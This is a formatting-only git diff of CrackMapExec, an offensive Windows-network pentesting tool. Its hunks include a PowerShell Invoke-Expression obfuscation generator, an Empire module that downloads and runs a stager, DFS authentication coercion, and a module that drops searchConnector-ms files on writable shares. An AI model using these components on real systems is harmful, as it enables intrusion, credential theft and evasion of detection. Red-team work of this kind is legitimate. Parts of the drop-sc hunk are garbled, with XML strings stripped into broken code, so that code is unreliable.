- + choice(["", " "]) - + '"' - + choice(["", " "]) - + "+" - + choice(["", " "]) - + str_str - + choice(baseScriptArray) - + choice(["", " "]) - + "+" - + '"' - + choice(["", " "]) - + "$(" - + choice(["", " "]) - + set_ofs_var_back - + choice(["", " "]) - + ")" - + choice(["", " "]) - + '"', + str_join + "(" + choice(["", " "]) + "''" + choice(["", " "]) + "," + choice(["", " "]) + choice(baseScriptArray) + choice(["", " "]) + ")", + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var + choice(["", " "]) + ")" + choice(["", " "]) + '"' + choice(["", " "]) + "+" + choice(["", " "]) + str_str + choice(baseScriptArray) + choice(["", " "]) + "+" + '"' + choice(["", " "]) + "$(" + choice(["", " "]) + set_ofs_var_back + choice(["", " "]) + ")" + choice(["", " "]) + '"', ] # Randomly select one of the above commands. @@ -545,38 +384,12 @@ def invoke_obfuscation(script_string): # These methods draw on common environment variable values and PowerShell Automatic Variable # values/methods/members/properties/etc. invocationOperator = choice([".", "&"]) + choice(["", " "]) - invoke_expression_syntax.append( - invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')" - ) - invoke_expression_syntax.append( - invocationOperator - + "( $PSHome[" - + choice(["4", "21"]) - + "]+$PSHOME[" - + choice(["30", "34"]) - + "]+'x')" - ) - invoke_expression_syntax.append( - invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')" - ) - invoke_expression_syntax.append( - invocationOperator - + "( $env:ComSpec[4," - + choice(["15", "24", "26"]) - + ",25]-Join'')" - ) - invoke_expression_syntax.append( - invocationOperator - + "((" - + choice(["Get-Variable", "GV", "Variable"]) - + " '*mdr*').Name[3,11,2]-Join'')" - ) - invoke_expression_syntax.append( - invocationOperator - + "( " - + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) - + "[1,3]+'x'-Join'')" - ) + invoke_expression_syntax.append(invocationOperator + "( $ShellId[1]+$ShellId[13]+'x')") + invoke_expression_syntax.append(invocationOperator + "( $PSHome[" + choice(["4", "21"]) + "]+$PSHOME[" + choice(["30", "34"]) + "]+'x')") + invoke_expression_syntax.append(invocationOperator + "( $env:Public[13]+$env:Public[5]+'x')") + invoke_expression_syntax.append(invocationOperator + "( $env:ComSpec[4," + choice(["15", "24", "26"]) + ",25]-Join'')") + invoke_expression_syntax.append(invocationOperator + "((" + choice(["Get-Variable", "GV", "Variable"]) + " '*mdr*').Name[3,11,2]-Join'')") + invoke_expression_syntax.append(invocationOperator + "( " + choice(["$VerbosePreference.ToString()", "([String]$VerbosePreference)"]) + "[1,3]+'x'-Join'')") # Randomly choose from above invoke operation syntaxes. invokeExpression = choice(invoke_expression_syntax) @@ -586,21 +399,8 @@ def invoke_obfuscation(script_string): # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) invokeOptions = [ - choice(["", " "]) - + invokeExpression - + choice(["", " "]) - + "(" - + choice(["", " "]) - + newScript - + choice(["", " "]) - + ")" - + choice(["", " "]), - choice(["", " "]) - + newScript - + choice(["", " "]) - + "|" - + choice(["", " "]) - + invokeExpression, + choice(["", " "]) + invokeExpression + choice(["", " "]) + "(" + choice(["", " "]) + newScript + choice(["", " "]) + ")" + choice(["", " "]), + choice(["", " "]) + newScript + choice(["", " "]) + "|" + choice(["", " "]) + invokeExpression, ] obfuscated_payload = choice(invokeOptions) diff --git a/cme/loaders/moduleloader.py b/cme/loaders/moduleloader.py index 5ef486b1..17784ce8 100755 --- a/cme/loaders/moduleloader.py +++ b/cme/loaders/moduleloader.py @@ -42,9 +42,7 @@ class ModuleLoader: self.logger.fail(f"{module_path} missing the options function") module_error = True elif not hasattr(module, "on_login") and not (module, "on_admin_login"): - self.logger.fail( - f"{module_path} missing the on_login/on_admin_login function(s)" - ) + self.logger.fail(f"{module_path} missing the on_login/on_admin_login function(s)") module_error = True # elif not hasattr(module, 'chain_support'): # self.logger.fail('{} missing the chain_support variable'.format(module_path)) @@ -80,13 +78,9 @@ class ModuleLoader: self.logger.debug(f"Protocol: {self.args.protocol}") if self.args.protocol in module.supported_protocols: try: - module_logger = CMEAdapter( - extra={"module_name": module.name.upper()} - ) + module_logger = CMEAdapter(extra={"module_name": module.name.upper()}) except Exception as e: - self.logger.fail( - f"Error loading CMEAdaptor for module {module.name.upper()}: {e}" - ) + self.logger.fail(f"Error loading CMEAdaptor for module {module.name.upper()}: {e}") context = Context(self.db, module_logger, self.args) module_options = {} @@ -97,9 +91,7 @@ class ModuleLoader: module.options(context, module_options) return module else: - self.logger.fail( - f"Module {module.name.upper()} is not supported for protocol {self.args.protocol}" - ) + self.logger.fail(f"Module {module.name.upper()} is not supported for protocol {self.args.protocol}") sys.exit(1) def get_module_info(self, module_path): diff --git a/cme/logger.py b/cme/logger.py index 7c1d0023..79a52325 100755 --- a/cme/logger.py +++ b/cme/logger.py @@ -55,11 +55,7 @@ class CMEAdapter(logging.LoggerAdapter): ) # If the logger is being called from CMEServer - if ( - len(self.extra) == 2 - and ("module_name" in self.extra.keys()) - and ("host" in self.extra.keys()) - ): + if len(self.extra) == 2 and ("module_name" in self.extra.keys()) and ("host" in self.extra.keys()): return ( f"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}", kwargs, @@ -86,9 +82,7 @@ class CMEAdapter(logging.LoggerAdapter): except AttributeError: pass - msg, kwargs = self.format( - f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs - ) + msg, kwargs = self.format(f"{colored('[*]', 'blue', attrs=['bold'])} {msg}", kwargs) text = Text.from_ansi(msg) cme_console.print(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs) @@ -103,9 +97,7 @@ class CMEAdapter(logging.LoggerAdapter): except AttributeError: pass - msg, kwargs = self.format( - f"{colored('[+]', 'green', attrs=['bold'])} {msg}", kwargs - ) + msg, kwargs = self.format(f"{colored('[+]', 'green', attrs=['bold'])} {msg}", kwargs) text = Text.from_ansi(msg) cme_console.print(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs) @@ -134,9 +126,7 @@ class CMEAdapter(logging.LoggerAdapter): return except AttributeError: pass - msg, kwargs = self.format( - f"{colored('[-]', 'red', attrs=['bold'])} {msg}", kwargs - ) + msg, kwargs = self.format(f"{colored('[-]', 'red', attrs=['bold'])} {msg}", kwargs) text = Text.from_ansi(msg) cme_console.print(text, *args, **kwargs) self.log_console_to_file(text, *args, **kwargs) @@ -168,9 +158,7 @@ class CMEAdapter(logging.LoggerAdapter): self.logger.info(text) def add_file_log(self, log_file=None): - file_formatter = TermEscapeCodeFormatter( - "%(asctime)s - %(levelname)s - %(message)s" - ) + file_formatter = TermEscapeCodeFormatter("%(asctime)s - %(levelname)s - %(message)s") output_file = self.init_log_file() if log_file is None else log_file file_creation = False @@ -182,15 +170,9 @@ class CMEAdapter(logging.LoggerAdapter): with file_handler._open() as f: if file_creation: - f.write( - "[%s]> %s\n\n" - % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)) - ) + f.write("[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv))) else: - f.write( - "\n[%s]> %s\n\n" - % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv)) - ) + f.write("\n[%s]> %s\n\n" % (datetime.now().strftime("%d-%m-%Y %H:%M:%S"), " ".join(sys.argv))) file_handler.setFormatter(file_formatter) self.logger.addHandler(file_handler) diff --git a/cme/modules/IOXIDResolver.py b/cme/modules/IOXIDResolver.py index b7067189..32bddb64 100644 --- a/cme/modules/IOXIDResolver.py +++ b/cme/modules/IOXIDResolver.py @@ -13,9 +13,7 @@ from impacket.dcerpc.v5.dcomrt import IObjectExporter class CMEModule: name = "ioxidresolver" - description = ( - "Thie module helps you to identify hosts that have additional active interfaces" - ) + description = "Thie module helps you to identify hosts that have additional active interfaces" supported_protocols = ["smb"] opsec_safe = True multiple_hosts = False diff --git a/cme/modules/MachineAccountQuota.py b/cme/modules/MachineAccountQuota.py index fc7f7550..59b4753e 100644 --- a/cme/modules/MachineAccountQuota.py +++ b/cme/modules/MachineAccountQuota.py @@ -29,6 +29,4 @@ class CMEModule: searchFilter = "(objectClass=*)" attributes = ["ms-DS-MachineAccountQuota"] result = connection.search(searchFilter, attributes) - context.log.highlight( - "MachineAccountQuota: %d" % result[0]["attributes"][0]["vals"][0] - ) + context.log.highlight("MachineAccountQuota: %d" % result[0]["attributes"][0]["vals"][0]) diff --git a/cme/modules/adcs.py b/cme/modules/adcs.py index 106215e3..50f87c26 100644 --- a/cme/modules/adcs.py +++ b/cme/modules/adcs.py @@ -45,9 +45,7 @@ class CMEModule: search_filter = f"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration," self.context.log.highlight("Using PKI CN: {}".format(self.server)) - context.log.display( - "Starting LDAP search with search filter '{}'".format(search_filter) - ) + context.log.display("Starting LDAP search with search filter '{}'".format(search_filter)) try: sc = ldap.SimplePagedResultsControl() @@ -101,22 +99,14 @@ class CMEModule: urls.append(match.group(1)) except Exception as e: entry = host_name or "item" - self.context.log.fail( - "Skipping {}, cannot process LDAP entry due to error: '{}'".format( - entry, str(e) - ) - ) + self.context.log.fail("Skipping {}, cannot process LDAP entry due to error: '{}'".format(entry, str(e))) if host_name: - self.context.log.highlight( - "Found PKI Enrollment Server: {}".format(host_name) - ) + self.context.log.highlight("Found PKI Enrollment Server: {}".format(host_name)) if cn: self.context.log.highlight("Found CN: {}".format(cn)) for url in urls: - self.context.log.highlight( - "Found PKI Enrollment WebService: {}".format(url) - ) + self.context.log.highlight("Found PKI Enrollment WebService: {}".format(url)) def process_templates(self, item): """ @@ -136,9 +126,7 @@ class CMEModule: templates.append(template_name) except Exception as e: entry = template_name or "item" - self.context.log.fail( - f"Skipping {entry}, cannot process LDAP entry due to error: '{e}'" - ) + self.context.log.fail(f"Skipping {entry}, cannot process LDAP entry due to error: '{e}'") if templates: for t in templates: diff --git a/cme/modules/bh_owned.py b/cme/modules/bh_owned.py index ff2edd82..c71cfb4f 100644 --- a/cme/modules/bh_owned.py +++ b/cme/modules/bh_owned.py @@ -60,19 +60,12 @@ class CMEModule: context.log.debug(f"User: {self.neo4j_user}, Password: {self.neo4j_pass}") try: - driver = GraphDatabase.driver( - uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False - ) + driver = GraphDatabase.driver(uri, auth=(self.neo4j_user, self.neo4j_pass), encrypted=False) except AuthError: - context.log.fail( - f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" - " not valid. See --options" - ) + context.log.fail(f"Provided Neo4J credentials ({self.neo4j_user}:{self.neo4j_pass}) are" " not valid. See --options") sys.exit() except ServiceUnavailable: - context.log.fail( - f"Neo4J does not seem to be available on {uri}. See --options" - ) + context.log.fail(f"Neo4J does not seem to be available on {uri}. See --options") sys.exit() except Exception as e: context.log.fail("Unexpected error with Neo4J") @@ -81,22 +74,14 @@ class CMEModule: with driver.session() as session: with session.begin_transaction() as tx: - result = tx.run( - f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' - " c.name AS name" - ) + result = tx.run(f'MATCH (c:Computer {{name:"{host_fqdn}"}}) SET c.owned=True RETURN' " c.name AS name") record = result.single() try: value = record.value() except AttributeError: value = [] if len(value) > 0: - context.log.success( - f"Node {host_fqdn} successfully set as owned in BloodHound" - ) + context.log.success(f"Node {host_fqdn} successfully set as owned in BloodHound") else: - context.log.fail( - f"Node {host_fqdn} does not appear to be in Neo4J database. Have you" - " imported the correct data?" - ) + context.log.fail(f"Node {host_fqdn} does not appear to be in Neo4J database. Have you" " imported the correct data?") driver.close() diff --git a/cme/modules/daclread.py b/cme/modules/daclread.py index 0321d7f2..83f185db 100644 --- a/cme/modules/daclread.py +++ b/cme/modules/daclread.py @@ -122,12 +122,8 @@ class ACE_FLAGS(Enum): # Since these two flags are the same for Allowed and Denied access, the same class will be used from 'ldaptypes' # https://docs.microsoft.com/en-us/windows/win32/api/winnt/ns-winnt-access_allowed_object_ace class OBJECT_ACE_FLAGS(Enum): - ACE_OBJECT_TYPE_PRESENT = ( - ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT - ) - ACE_INHERITED_OBJECT_TYPE_PRESENT = ( - ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT - ) + ACE_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT + ACE_INHERITED_OBJECT_TYPE_PRESENT = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_INHERITED_OBJECT_TYPE_PRESENT # Access Mask enum @@ -223,9 +219,7 @@ class CMEModule: self.context = context if not module_options: - context.log.fail( - "Select an option, example: -M daclread -o TARGET=Administrator ACTION=read" - ) + context.log.fail("Select an option, example: -M daclread -o TARGET=Administrator ACTION=read") exit(1) if module_options and "TARGET" in module_options: @@ -274,9 +268,7 @@ class CMEModule: On a successful LDAP login we perform a search for the targets' SID, their Security Decriptors and the principal's SID if there is one specified """ - context.log.highlight( - "Be carefull, this module cannot read the DACLS recursively." - ) + context.log.highlight("Be carefull, this module cannot read the DACLS recursively.") self.baseDN = connection.ldapConnection._baseDN self.ldap_session = connection.ldapConnection @@ -287,18 +279,17 @@ class CMEModule: self.principal_sid = format_sid( self.ldap_session.search( searchBase=self.baseDN, - searchFilter="(sAMAccountName=%s)" - % escape_filter_chars(_lookedup_principal), + searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal), attributes=["objectSid"], - )[0][1][0][1][0] - ) - context.log.highlight( - "Found principal SID to filter on: %s" % self.principal_sid + )[0][ + 1 + ][0][ + 1 + ][0] ) + context.log.highlight("Found principal SID to filter on: %s" % self.principal_sid) except Exception as e: - context.log.fail( - "Principal SID not found in LDAP (%s)" % _lookedup_principal - ) + context.log.fail("Principal SID not found in LDAP (%s)" % _lookedup_principal) exit(1) # Searching for the targets SID and their Security Decriptors @@ -309,19 +300,11 @@ class CMEModule: self.search_target_principal_security_descriptor(context, connection) # Extract security descriptor data self.target_principal_dn = self.target_principal[0] - self.principal_raw_security_descriptor = str( - self.target_principal[1][0][1][0] - ).encode("latin-1") - self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR( - data=self.principal_raw_security_descriptor - ) - context.log.highlight( - "Target principal found in LDAP (%s)" % self.target_principal[0] - ) + self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1") + self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor) + context.log.highlight("Target principal found in LDAP (%s)" % self.target_principal[0]) except Exception as e: - context.log.fail( - "Target SID not found in LDAP (%s)" % self.target_sAMAccountName - ) + context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName) exit(1) if self.action == "read": @@ -336,27 +319,14 @@ class CMEModule: try: self.target_sAMAccountName = target.strip() # Searching for target account with its security descriptor - self.search_target_principal_security_descriptor( - context, connection - ) + self.search_target_principal_security_descriptor(context, connection) # Extract security descriptor data self.target_principal_dn = self.target_principal[0] - self.principal_raw_security_descriptor = str( - self.target_principal[1][0][1][0] - ).encode("latin-1") - self.principal_security_descriptor = ( - ldaptypes.SR_SECURITY_DESCRIPTOR( - data=self.principal_raw_security_descriptor - ) - ) - context.log.highlight( - "Target principal found in LDAP (%s)" - % self.target_sAMAccountName - ) + self.principal_raw_security_descriptor = str(self.target_principal[1][0][1][0]).encode("latin-1") + self.principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.principal_raw_security_descriptor) + context.log.highlight("Target principal found in LDAP (%s)" % self.target_sAMAccountName) except Exception as e: - context.log.fail( - "Target SID not found in LDAP (%s)" % self.target_sAMAccountName - ) + context.log.fail("Target SID not found in LDAP (%s)" % self.target_sAMAccountName) continue if self.action == "read": @@ -367,9 +337,7 @@ class CMEModule: # Main read funtion # Prints the parsed DACL def read(self, context): - parsed_dacl = self.parse_dacl( - context, self.principal_security_descriptor["Dacl"] - ) + parsed_dacl = self.parse_dacl(context, self.principal_security_descriptor["Dacl"]) self.print_parsed_dacl(context, parsed_dacl) return @@ -377,9 +345,7 @@ class CMEModule: # This function is called before any writing action (write, remove or restore) def backup(self, context): backup = {} - backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode( - "latin-1" - ) + backup["sd"] = binascii.hexlify(self.principal_raw_security_descriptor).decode("latin-1") backup["dn"] = str(self.target_principal_dn) if not self.filename: self.filename = "dacledit-%s-%s.bak" % ( @@ -400,8 +366,7 @@ class CMEModule: _lookedup_principal = self.target_sAMAccountName target = self.ldap_session.search( searchBase=self.baseDN, - searchFilter="(sAMAccountName=%s)" - % escape_filter_chars(_lookedup_principal), + searchFilter="(sAMAccountName=%s)" % escape_filter_chars(_lookedup_principal), attributes=["nTSecurityDescriptor"], searchControls=controls, ) @@ -416,10 +381,7 @@ class CMEModule: try: self.target_principal = target[0] except Exception as e: - context.log.fail( - "Principal not found in LDAP (%s), probably an LDAP session issue." - % _lookedup_principal - ) + context.log.fail("Principal not found in LDAP (%s), probably an LDAP session issue." % _lookedup_principal) exit(0) # Attempts to retieve the SID and Distinguisehd Name from the sAMAccountName @@ -452,12 +414,18 @@ class CMEModule: searchBase=self.baseDN, searchFilter="(objectSid=%s)" % sid, attributes=["sAMAccountName"], - )[0][0] + )[ + 0 + ][0] samname = self.ldap_session.search( searchBase=self.baseDN, searchFilter="(objectSid=%s)" % sid, attributes=["sAMAccountName"], - )[0][1][0][1][0] + )[0][ + 1 + ][0][ + 1 + ][0] return samname except Exception as e: context.log.debug("SID not found in LDAP: %s" % sid) @@ -516,8 +484,7 @@ class CMEModule: ace["Ace"]["Mask"]["Mask"], ) parsed_ace["Trustee (SID)"] = "%s (%s)" % ( - self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) - or "UNKNOWN", + self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN", ace["Ace"]["Sid"].formatCanonical(), ) @@ -550,31 +517,23 @@ class CMEModule: parsed_ace["Object type (GUID)"] = "UNKNOWN (%s)" % obj_type # Extracts the InheritedObjectType GUID values if ace["Ace"]["InheritedObjectTypeLen"] != 0: - inh_obj_type = bin_to_string( - ace["Ace"]["InheritedObjectType"] - ).lower() + inh_obj_type = bin_to_string(ace["Ace"]["InheritedObjectType"]).lower() try: parsed_ace["Inherited type (GUID)"] = "%s (%s)" % ( OBJECT_TYPES_GUID[inh_obj_type], inh_obj_type, ) except KeyError: - parsed_ace["Inherited type (GUID)"] = ( - "UNKNOWN (%s)" % inh_obj_type - ) + parsed_ace["Inherited type (GUID)"] = "UNKNOWN (%s)" % inh_obj_type # Extract the Trustee SID (the object that has the right over the DACL bearer) parsed_ace["Trustee (SID)"] = "%s (%s)" % ( - self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) - or "UNKNOWN", + self.resolveSID(context, ace["Ace"]["Sid"].formatCanonical()) or "UNKNOWN", ace["Ace"]["Sid"].formatCanonical(), ) else: # If the ACE is not an access allowed - context.log.debug( - "ACE Type (%s) unsupported for parsing yet, feel free to contribute" - % ace["TypeName"] - ) + context.log.debug("ACE Type (%s) unsupported for parsing yet, feel free to contribute" % ace["TypeName"]) parsed_ace = {} parsed_ace["ACE type"] = ace["TypeName"] _ace_flags = [] @@ -582,9 +541,7 @@ class CMEModule: if ace.hasFlag(FLAG.value): _ace_flags.append(FLAG.name) parsed_ace["ACE flags"] = ", ".join(_ace_flags) or "None" - parsed_ace[ - "DEBUG" - ] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute" + parsed_ace["DEBUG"] = "ACE type not supported for parsing by dacleditor.py, feel free to contribute" return parsed_ace # Prints a full DACL by printing each parsed ACE @@ -600,76 +557,38 @@ class CMEModule: # Filter on specific rights if self.rights is not None: try: - if (self.rights == "FullControl") and ( - self.rights not in parsed_ace["Access mask"] - ): + if (self.rights == "FullControl") and (self.rights not in parsed_ace["Access mask"]): print_ace = False - if (self.rights == "DCSync") and ( - ("Object type (GUID)" not in parsed_ace) - or ( - RIGHTS_GUID.DS_Replication_Get_Changes_All.value - not in parsed_ace["Object type (GUID)"] - ) - ): + if (self.rights == "DCSync") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.DS_Replication_Get_Changes_All.value not in parsed_ace["Object type (GUID)"])): print_ace = False - if (self.rights == "WriteMembers") and ( - ("Object type (GUID)" not in parsed_ace) - or ( - RIGHTS_GUID.WriteMembers.value - not in parsed_ace["Object type (GUID)"] - ) - ): + if (self.rights == "WriteMembers") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.WriteMembers.value not in parsed_ace["Object type (GUID)"])): print_ace = False - if (self.rights == "ResetPassword") and ( - ("Object type (GUID)" not in parsed_ace) - or ( - RIGHTS_GUID.ResetPassword.value - not in parsed_ace["Object type (GUID)"] - ) - ): + if (self.rights == "ResetPassword") and (("Object type (GUID)" not in parsed_ace) or (RIGHTS_GUID.ResetPassword.value not in parsed_ace["Object type (GUID)"])): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) # Filter on specific right GUID if self.rights_guid is not None: try: - if ("Object type (GUID)" not in parsed_ace) or ( - self.rights_guid not in parsed_ace["Object type (GUID)"] - ): + if ("Object type (GUID)" not in parsed_ace) or (self.rights_guid not in parsed_ace["Object type (GUID)"]): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) # Filter on ACE type if self.ace_type == "allowed": try: - if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ( - "ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"] - ): + if ("ACCESS_ALLOWED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_ALLOWED_ACE" not in parsed_ace["ACE Type"]): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) else: try: - if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ( - "ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"] - ): + if ("ACCESS_DENIED_OBJECT_ACE" not in parsed_ace["ACE Type"]) and ("ACCESS_DENIED_ACE" not in parsed_ace["ACE Type"]): print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) # Filter on trusted principal if self.principal_sid is not None: @@ -677,10 +596,7 @@ class CMEModule: if self.principal_sid not in parsed_ace["Trustee (SID)"]: print_ace = False except Exception as e: - context.log.fail( - "Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" - % e - ) + context.log.fail("Error filtering ACE, probably because of ACE type unsupported for parsing yet (%s)" % e) if print_ace: self.context.log.highlight("%-28s" % "ACE[%d] info" % i) self.print_parsed_ace(parsed_ace) @@ -691,9 +607,7 @@ class CMEModule: def print_parsed_ace(self, parsed_ace): elements_name = list(parsed_ace.keys()) for attribute in elements_name: - self.context.log.highlight( - " %-26s: %s" % (attribute, parsed_ace[attribute]) - ) + self.context.log.highlight(" %-26s: %s" % (attribute, parsed_ace[attribute])) # Retrieves the GUIDs for the specified rights def build_guids_for_rights(self): diff --git a/cme/modules/dfscoerce.py b/cme/modules/dfscoerce.py index 9266afb0..58bdbf55 100644 --- a/cme/modules/dfscoerce.py +++ b/cme/modules/dfscoerce.py @@ -38,9 +38,7 @@ class CMEModule: domain=connection.domain, lmhash=connection.lmhash, nthash=connection.nthash, - target=connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain, + target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain, doKerberos=connection.kerberos, dcHost=connection.kdcHost, ) @@ -105,12 +103,8 @@ class NetrDfsAddRootResponse(NDRCALL): class TriggerAuth: - def connect( - self, username, password, domain, lmhash, nthash, target, doKerberos, dcHost - ): - rpctransport = transport.DCERPCTransportFactory( - r"ncacn_np:%s[\PIPE\netdfs]" % target - ) + def connect(self, username, password, domain, lmhash, nthash, target, doKerberos, dcHost): + rpctransport = transport.DCERPCTransportFactory(r"ncacn_np:%s[\PIPE\netdfs]" % target) if hasattr(rpctransport, "set_credentials"): rpctransport.set_credentials( username=username, diff --git a/cme/modules/drop-sc.py b/cme/modules/drop-sc.py index b10f0a48..328f3496 100644 --- a/cme/modules/drop-sc.py +++ b/cme/modules/drop-sc.py @@ -49,18 +49,13 @@ class CMEModule: scfile = open(self.scfile_path, "w") scfile.truncate(0) scfile.write('') - scfile.write( - "' - ) + scfile.write("') scfile.write("Microsoft Outlook") scfile.write("false") scfile.write("true") scfile.write(f"{self.url}/0001.ico") scfile.write("") - scfile.write( - "{91475FE5-586B-4EBA-8D75-D17434B8CDF6}" - ) + scfile.write("{91475FE5-586B-4EBA-8D75-D17434B8CDF6}") scfile.write("") scfile.write("") scfile.write("{}".format(self.url)) @@ -72,37 +67,19 @@ class CMEModule: shares = connection.shares() for share in shares: context.log.debug(f"Share: {share}") - if "WRITE" in share["access"] and ( - share["name"] == self.sharename - if self.sharename != "" - else share["name"] not in ["C$", "ADMIN$"] - ): + if "WRITE" in share["access"] and (share["name"] == self.sharename if self.sharename != "" else share["name"] not in ["C$", "ADMIN$"]): context.log.success(f"Found writable share: {share['name']}") if not self.cleanup: with open(self.scfile_path, "rb") as scfile: try: - connection.conn.putFile( - share["name"], self.file_path, scfile.read - ) - context.log.success( - f"[OPSEC] Created {self.filename}.searchConnector-ms" - f" file on the {share['name']} share" - ) + connection.conn.putFile(share["name"], self.file_path, scfile.read) + context.log.success(f"[OPSEC] Created {self.filename}.searchConnector-ms" f" file on the {share['name']} share") except Exception as e: context.log.exception(e) - context.log.fail( - f"Error writing {self.filename}.searchConnector-ms file" - f" on the {share['name']} share: {e}" - ) + context.log.fail(f"Error writing {self.filename}.searchConnector-ms file" f" on the {share['name']} share: {e}") else: try: connection.conn.deleteFile(share["name"], self.file_path) - context.log.success( - f"Deleted {self.filename}.searchConnector-ms file on the" - f" {share['name']} share" - ) + context.log.success(f"Deleted {self.filename}.searchConnector-ms file on the" f" {share['name']} share") except Exception as e: - context.log.fail( - f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" - f" file on share {share['name']}: {e}" - ) + context.log.fail(f"[OPSEC] Error deleting {self.filename}.searchConnector-ms" f" file on share {share['name']}: {e}") diff --git a/cme/modules/empire_exec.py b/cme/modules/empire_exec.py index d1ad3557..f463867a 100644 --- a/cme/modules/empire_exec.py +++ b/cme/modules/empire_exec.py @@ -41,11 +41,7 @@ class CMEModule: obfuscate = True if "OBFUSCATE" in module_options else False # we can use commands instead of backslashes - this is because Linux and OSX treat them differently default_obfuscation = "Token,All,1" - obfuscate_cmd = ( - module_options["OBFUSCATE_CMD"] - if "OBFUSCATE_CMD" in module_options - else default_obfuscation - ) + obfuscate_cmd = module_options["OBFUSCATE_CMD"] if "OBFUSCATE_CMD" in module_options else default_obfuscation context.log.debug(f"Obfuscate: {obfuscate} - Obfuscate_cmd: {obfuscate_cmd}") # Pull the host and port from the config file @@ -111,9 +107,7 @@ class CMEModule: if "not found" in stager_response.json()["detail"]: context.log.fail(f"Listener {module_options['LISTENER']} not found") else: - context.log.fail( - f"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}" - ) + context.log.fail(f"Stager response received a non-200 when creating stager: {stager_response.status_code} {stager_response.text}") sys.exit(1) context.log.debug(f"Response Code: {stager_response.status_code}") @@ -134,13 +128,9 @@ class CMEModule: self.empire_launcher = download_response.text if download_response.status_code == 200: - context.log.success( - f"Successfully generated launcher for listener '{module_options['LISTENER']}'" - ) + context.log.success(f"Successfully generated launcher for listener '{module_options['LISTENER']}'") else: - context.log.fail( - f"Something went wrong when retrieving stager Powershell command" - ) + context.log.fail(f"Something went wrong when retrieving stager Powershell command") def on_admin_login(self, context, connection): if self.empire_launcher: diff --git a/cme/modules/enum_av.py b/cme/modules/enum_av.py index a01c350c..94f861ac 100644 --- a/cme/modules/enum_av.py +++ b/cme/modules/enum_av.py @@ -33,16 +33,8 @@ class CMEModule: def on_login(self, context, connection): success = 0 results = {} - target = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) - context.log.debug( - "Detecting installed services on {} using LsarLookupNames()...".format( - target - ) - ) + target = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain + context.log.debug("Detecting installed services on {} using LsarLookupNames()...".format(target)) try: lsa = LsaLookupNames( @@ -62,9 +54,7 @@ class CMEModule: for service in product["services"]: try: lsa.LsarLookupNames(dce, policyHandle, service["name"]) - context.log.display( - f"Detected installed service on {connection.host}: {product['name']} {service['description']}" - ) + context.log.display(f"Detected installed service on {connection.host}: {product['name']} {service['description']}") if product["name"] not in results: results[product["name"]] = {"services": []} results[product["name"]]["services"].append(service) @@ -74,18 +64,14 @@ class CMEModule: except Exception as e: context.log.fail(str(e)) - context.log.display( - f"Detecting running processes on {connection.host} by enumerating pipes..." - ) + context.log.display(f"Detecting running processes on {connection.host} by enumerating pipes...") try: for f in connection.conn.listPath("IPC$", "\\*"): fl = f.get_longname() for i, product in 